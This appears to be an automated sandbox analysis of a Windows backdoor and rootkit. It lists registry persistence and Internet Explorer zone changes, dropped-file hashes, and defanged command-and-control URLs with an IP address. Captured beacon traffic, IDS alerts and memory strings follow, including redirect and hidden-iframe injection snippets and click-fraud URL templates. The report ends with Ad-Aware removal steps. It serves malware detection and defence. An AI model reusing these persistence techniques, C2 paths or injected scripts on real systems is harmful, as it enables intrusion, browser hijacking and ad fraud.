[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"grpconv.exe" = "Windows Progman Group Converter"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"

The process %original file name%.exe:556 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 F7 E0 5A A1 E8 C9 33 5A 2F A2 69 17 BB 09 3F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"3IC.exe" = "3IC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"cb.exe" = "Systray .exe stub"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"5tbp.exe" = "TouchChip USB Kernel Driver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"1EuroP.exe" = "1EuroP"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"4IR.exe" = "4IR"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"2gansta.exe" = "Test Two"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe,"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process Rundll32.exe:132 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 2E A7 00 08 AF DF BB 26 E3 D7 1F 71 B5 82 F2"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"

The process grpconv.exe:1484 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F CD 41 11 B6 2C EB AF 5B F8 A1 08 B4 55 CB DB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\GrpConv]
"Log" = "Init Application."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\MSProgramGroup\Shell\Open\Command]
"(Default)" = "%System%\grpconv.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\MSProgramGroup]
"(Default)" = "Microsoft Program Group"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.grp]
"(Default)" = "MSProgramGroup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process 5tbp.exe:1264 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 27 62 FD 7E 63 A3 C0 E8 0F 6A D3 8F D5 14 A9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Bveqayeweci" = "43 01 38 03 58 05 51 07 41 09 44 0B 48 0D 41 0F"
"Ydapup" = "35 01 33 03 37 05 45 07 4C 09 3F 0B 4A 0D 3A 0F"

Dropped PE files

MD5 File path
b54d180b4b23166a77aa094abbb7e05e c:\Documents and Settings\"%CurrentUserName%"\Application Data\lnhz9.exe
ae47033b743527c7e1f39f4297f53b68 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7.tmp
b9c28d93c32633293ff6e661431f663c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\5tbp.exe
f15b3da3643e4c520b8a7c874db49d0e c:\WINDOWS\msdnih.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "UNKNOWN" the Backdoor controls loading executable images into a memory by installing the Load image notifier.
Using the driver ROOTKITPATH the Backdoor intercepts DriverStartIO in a miniport driver of a hard drive controller (ATAPI) to handle request to its own files:

StartIo

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23458 23552 4.5133 2cec663f64ef38694dc96bb9f9cb766d
.rdata 28672 4496 4608 3.58909 db16645055619c0cc73276ff5c3adb75
.data 36864 3774424 1024 3.26654 b9d0aa986d9e766521436f5ad38cd7c5
.ndata 3813376 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3846144 1736 2048 2.01899 2f2678dd9e97ae3fdffce33f180dbf60

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 78
13ab683047580206713a0f19ebe0427e
3a9d59d3c0513d9e09bdd7cd0913317a
09af02fa44c6bf227bb0d6e199a19499
6c77646a57ca346f85955675f504c751
52badfde88a0ee73f28b070519156057
35f27015c54bef542f360a7c2ba5c229
09044e8d1e7cb7f6883f983c17d17bcc
0503370605c61ff728ff008dc03a1825
709c892167fce654126edb577421be29
1dc8f3bb2a983d7137276a217b4d705b
0f339065053ebd425e75b23558963750
ca5d6a20d387eb2e49389f6a39636da9
8a2f117c3e780d2a0ee0aefc9602d738
14e473d02dd6b3107715a02a70cfc4ca
450999c36485a084aa7dd1b603da875b
a51b0e4d59528d3c37c089b3920aefe1
2f92f621850cf288ff8a61cc0a7e1034
0092c82b8f71c849b1799747344a0013
848bd0a9a22e7e72609328d19e9ac880
273bae01660db7dac324f798d2c8812b
e612517c3e59b53ffb829dab9699a8f7
5853e9ba1c8d75393dcef359471d5a9e
90eeaf37ac1ec866ddf48f1f56edf745
65b18506a33d72ec059fb281acf7f87e
485f7cc7b007342caccad569a8eb6b44

URLs

URL IP
hxxp://rooftopjam.in/?ini=v22MyzzjT4KjWDNmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV7ZlDeAiBMF4XAHPzfI6RtufQpKX/MPtpuu7okA==
hxxp://bascheme.com/orltke/cqksml.php?adv=adv401&id=-1465484763&c=-183204857
hxxp://bascheme.com/orltke/mdhpjrpm.php?adv=adv401&id=-1465484763&c=-183204857
hxxp://050407e0092c.e-info-update.org/get2.php?c=HUXKCMMH&d=26606B67393437333F2F676268307D3F222023232C24243177757E4469747A2219151A4210121F150E5C434F11181F1C73750775000602077B0D080D787C7F077675720205077E047E7A7E08786B2C263E27372169646F617E31333F616F3B39570455020043070305545B4D031E180A024C472C455329031B12474B4C4D4E47B7B3BAB6BDA3F6F5E7EAB7CEF4FDE2E0E2F4E0BDD1CDD3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919D88C98D8094C1898490D4D6DDD686E4ED8999A9A5A3B7A1F8F7F4F9FAFBF3FBFDFAF8F6949D81 192.155.89.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Tibs/Harnig Downloader Activity
ET TROJAN Suspicious User-Agent - Possible Trojan Downloader (ver18/ver19, etc)
ET TROJAN Hiloti/Mufanom Downloader Checkin
ET TROJAN Hiloti Style GET to PHP with invalid terse MSIE headers
ET TROJAN Long Fake wget 3.0 User-Agent Detected
ET TROJAN Artro Downloader User-Agent Detected

Traffic

GET /orltke/cqksml.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76
Host: bascheme.com


HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:52:59 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Sun, 
04 Sep 2016 05:52:59 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome 
friendly error page -->..<!-- a padding to disable MSIE and 
<<< skipped >>>

GET /orltke/mdhpjrpm.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76
Host: bascheme.com


HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:53:01 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Sun, 
04 Sep 2016 05:53:01 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome 
friendly error page -->..<!-- a padding to disable MSIE and 
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

rundll32.exe_636:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

rundll32.exe_636_rwx_10000000_00001000:

.text
`.data
.reloc

lnhz9.exe_352:

`.rsrc
tl.We
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
kYg%D
}.rsrc
KERNEL32.DLL
MSVBVM60.DLL
USER32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
1.01.0001
6hOJ5TI7NaFF0jGgvCqBuzUGD6ROpFip.exe

lnhz9.exe_352_rwx_00401000_0002C000:

SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
USER32.DLL
KERNEL32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy

lnhz9.exe_220:

`.rsrc
tl.We
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
kYg%D
}.rsrc
KERNEL32.DLL
MSVBVM60.DLL
USER32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
1.01.0001
6hOJ5TI7NaFF0jGgvCqBuzUGD6ROpFip.exe

lnhz9.exe_220_rwx_00401000_0002C000:

SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
USER32.DLL
KERNEL32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy

Explorer.EXE_532_rwx_00FF0000_0000A000:

ver76%szqusn.php?adv=
SafariChromeFirefox
httpo
PSSh\4
.exeu]
%szqusn.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
Chrome
Firefox
Opera
%sypwobybw.exe
%scqksml.php?adv=adv401&id=%d&c=%d
%swqueauo.exe
%smdhpjrpm.php?adv=adv401&id=%d&c=%d
%sdpfom.exe
%swaemxrzu.php?adv=adv401&id=%d&c=%d
%sxadxfbn.exe
%sqqlsqy.php?adv=adv401&id=%d&c=%d
%sgripwn.exe
%spfwicxeqx.php?adv=adv401&id=%d&c=%d
%swutei.exe
%sosmhbjeyw.php?adv=adv401&id=%d&c=%d
%svsjmv.exe
%shhojrlgrzg.php?adv=adv401&id=%d&c=%d
%saxmgx.exe
%sbbweytelg.php?adv=adv401&id=%d&c=%d
%salvwv.exe
%sctkidxfd.php?adv=adv401&id=%d&c=%d
%sgdqt.exe
%sevpxfz.php?adv=adv401&id=%d&c=%d
%srant.exe
%sermgbv.php?adv=adv401&id=%d&c=%d
%sarhcaidx.php?adv=adv401&id=%d&c=%d
hXXp://bascheme.com/orltke/
hXXp://aahacker.com/orltke/
psapi.dll
ddraw.dll
urlmon.dll
shell32.dll
kernel32.dll
user32.dll
wininet.dll
ntdll.dll
\svchost.exe
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\2gansta.exe
ShellExecuteExA
InternetOpenUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ADVAPI32.dll
DDRAW.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll

Explorer.EXE_532_rwx_01E00000_00001000:

.text
`.data
.reloc

svchost.exe_1084_rwx_00A30000_0001A000:

Fmsvcrt.dll
%d %d %d %d %d %d
hXXps://
hXXp://
.com/
Global\C3819288-93FA-4E29-A254-BD9476B53C20
cfg.ini
%s\%s
bckfg.tmp
lsflt7.ver
0;225;224;77;38;56;16;74;75
maxhttpredirects
software\microsoft\windows\currentversion\internet settings
enablehttp1_1
software\microsoft\windows\currentversion\internet settings\zones\3
{AEBA21FA-782A-4A90-978D-B72164C80120}
{A8A88C49-5EB2-4990-A1A2-0876022C854F}
Opera\Opera\operaprefs.ini
\profile\operaprefs.ini
\prefs.js
network.cookie.cookieBehavior
Mozilla\Firefox\Profiles\
/login/;/tweet/;action=embed-flash;/faq/;/terms/;/contact/;/Forgotpassword/;d.gossipcenter.com/ck.php
hXXp://%s/?xurl=%s&xref=%s
ole32.dll
winmm.dll
atl.dll
oleaut32.dll
clk=%s&bid=%s&aid=%s&sid=%s&rd=%s
n%D,3
Global\6C29A0C8-62C6-415C-9538-B87690BC58D2
lsash.xp
%d|%d|%s|%s
cmd.dll
cmd64.dll
setup.exe
%u|%s
%s=%u|%s
%[^.].%[^(](%[^)])
command|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s
masks|%s
hXXp://NO REF/
.softgeek.
%s#%s
url|%s%s|
%s.dll
kernel32.dll
12345678
0123456789
.text
.rdata
HTTP/1.1 302 Found
Location: %s
HTTP/1.1 200 OK
Content-Length: %d
%sConnection: close
<body><a id=link target=_top></body><script>var url='%s';try{var x=document.getElementById('link');x.href=url;x.click()}catch(e){try{var x=parent?parent:window;x.location.replace(url)}catch(e){}}</script><noscript><META http-equiv="refresh" content="0;URL='%s'"></noscript>
<iframe src='%s' style='visibility:hidden;'></iframe>
<script>history.back()</script>
Set-Cookie: %s; expires=%s, u-%s-u u:u:u GMT
urlmon.dll
Global\56684A82-D074-4384-AEB9-D1A40041D9FB
chrome
wermgr.exe
-queuereporting_svc
firefox
opera
svchost.exe
ping.exe
127.0.0.1 -t
Global\B10C62E4-234C-4BF6-A1D5-1C0309CED145
Global\D6E9C81C-3831-4873-96BA-7C98D2DEBEF9
Global\a68d7de8-eba6-4a54-90e0-9cb9d93b3ed7
Global\cc51461b-e32a-4883-8e97-e0706dc65415
keywords
Accept-Language: %s
%s hXXp://%s/?xurl=%s&xref=%s
%s %s
1.8|%s|%s|%s|%s|%s|%s
software\classes\http\shell\open\command
<>:"/\|?*
%s-%s
. d SP.%s
google;yahoo;bing.;live.com;msn.com;altavista.com;ask.com;exalead.com;excite.com;dogpile.com;metacrawler.com;webcrawler.com;alltheweb.com;.lycos.;gigablast.com;cuil.com;.aol.;entireweb.com;.search.com;mamma.com;mytalkingbuddy.com;about.com;conduit.com;alexa.com;alltheinternet.com;blinkx.com;aolcdn.com;othersonline.com;everesttech.net;adrevolver.com;tribalfusion.com;adbureau.net;abmr.net;gstatic.com;virtualearth.net;atdmt.com;ivwbox.;powerset.net;yimg.com;2mdn.net;doubleclick.net;iwon.com;scorecardresearch.com;66.235.120.66;66.235.120.67;ytimg.com;infospace.com;edgesuite.net;superpages.com;lygo.com;compete.com;firmserve.com;worthathousandwords.com;yieldmanager.com;wazizu.com;meedea.com;atwola.com;doubleverify.com;tacoda.net;truveo.com;openx.org;adcertising.com;twimg.com;picsearch.com;oneriot.com;.com.com;flickr.com;searchvideo.com;.tqn.com;myspacecdn.com;fimservecdn.com;alexametrics.com
%u|%u
ver=%s&bid=%s&aid=%s&sid=%s&rd=%s&eng=%s&q=%s
hXXp://%s%s
VVV.google.
search.yahoo.com
.altavista.com
/web/results
.ask.com
VVV.exalead.com
/search/web/results
VVV.alltheweb.com
search.lycos.
tab=web
gigablast.com
cuil.com
.aol.
entireweb.com
md=web
VVV.search.com
VVV.mamma.com
mytalkingbuddy.com
searchservice.myspace.com
type=web
search.conduit.com
search.toolbars.alexa.com
alltheinternet.com
/ws/results/web/
?xurl=
http/1.
mozilla
windowsupdate
3506948937
1472967862
\\?\globalroot\device\00000ff8\3f32a78a\lsash.xp
%WinDir%\System32\svchost.exe
\\?\globalroot\device\00000ff8\3f32a78a
\\?\globalroot\device\00000ff8\3f32a78a\cfg.ini
WinExec
SHEnumKeyExA
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoW
InternetCrackUrlA
`.rdata
@.data
.reloc
b=RzX.aExU
KERNEL32.DLL
ADVAPI32.dll
imagehlp.dll
ntdll.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WebBrowser
127.0.0.1
/c.php?
.google.
%s-%d
eplorer\iexplore.exe" -nohome

spoolsv.exe_1424_rwx_00F00000_00028000:

.text
`.rdata
@.data
.config
.reloc
t%SSS
N. d SP.
%x%x%x%x%x%x
%s|%s|%s|%x|%x|%s|%x|%x|prn15
%[^;];%[^;];%[^;];
kernel32.dll
ntdll.dll
\\?\globalroot\systemroot\system32\kernel32.dll
%s\cfg.ini
%s\config.ini
%s\drv32
cmd.dll
%s\bckfg.tmp
%s\cmd.dll
%s\cmd64.dll
%[^|]|%[^|]|%s
system\currentcontrolset\services\%x
\\?\globalroot%s\cmd.dll
\\?\globalroot%s\cfg.ini
\\?\globalroot%s\bckfg.tmp
%d.%d.%d %d:%d:%d
\\?\globalroot%s\ldr16
\\?\globalroot%s\ldr32
\\?\globalroot%s\ldr64
\\?\globalroot%s\drv64
\\?\globalroot%s\cmd64.dll
cmd64.dll
\\?\globalroot%s\drv32
\\?\globalroot\systemroot\system32\kdcom.dll
\\?\globalroot\systemroot\system32\hal.dll
\\?\globalroot\systemroot\system32\ntoskrnl.exe
\\?\globalroot\systemroot\system32\drivers\etc\hosts
aid=%s
sid=%s
installdate=%s
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=%s
wsrv=%s
psrv=%s
cfg.ini
bckfg.tmp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><ms_asmv2:trustInfo xmlns:ms_asmv2="urn:schemas-microsoft-com:asm.v2"><ms_asmv2:security><ms_asmv2:requestedPrivileges><ms_asmv2:requestedExecutionLevel level="requireAdministrator"></ms_asmv2:requestedExecutionLevel></ms_asmv2:requestedPrivileges></ms_asmv2:security></ms_asmv2:trustInfo></assembly>
ZwConnectPort
spoolsv.exe
GetWindowsDirectoryW
KERNEL32.dll
RegCreateKeyA
RegCloseKey
ADVAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
imagehlp.dll
PSAPI.DLL
RPCRT4.dll
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
ShellExecuteW
SHELL32.dll
ole32.dll
WINSPOOL.DRV
.pnLu
`.reloc
kdcom.dll
ntoskrnl.exe
`.pdata
}.Bl$
.PFkX
:F-I}|
.JOf~
Vy;%F
u"%cO
\{x-x-x-x-xx}
\registry\machine\%S
\??\physicaldrive%d
services.exe
\??\globalroot\systemroot\system32\tasks\%x
\\?\globalroot%s
%s.manifest
%s\setup%u.exe
r\\?\globalroot%s

spoolsv.exe_1424_rwx_01320000_00046000:

.itext
`.rdata
.rsrc
@.reloc
MSVCRT.dll
comdlg32.dll
SHLWAPI.dll
KERNEL32.dll
GDI32.dll
MapVirtualKeyExW
ActivateKeyboardLayout
USER32.dll
Windows_NT
windows_Nt
P_A.Zt
5.hi^
d&.lYQD
 QSSH^)
`%Sea
H}
<y.em
oCrt
l-R%x
!6R%X&
n.WUQ
#9.OO
.eLk#
L:\kKjQxs\ybHesqe\ntKn\piSAssM.pdb
wjwtcP
OrlQdUA7.exe
8.92989<9
1 1$1(1,1014181@1
H:\HGJHGJH\SGKSJGJHSGJHGS\SKJHKJH\
VVV.hkjdh.com/../dsajdh/./sdasda/../asdasd
H:\HGDGYGGJHG\JHDGJHGDJH\DHKJHDJHKJ\DJHKJDHKJDHKJHDKJHDKJH\
C:\win\desktop\temp.txt
c:\win\tray\sample.txt
H:\hgdgyggjhg\jhdgjhgdjh\dhkjhdjhkj\djhkjdhk
Omovypoywudprxbp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
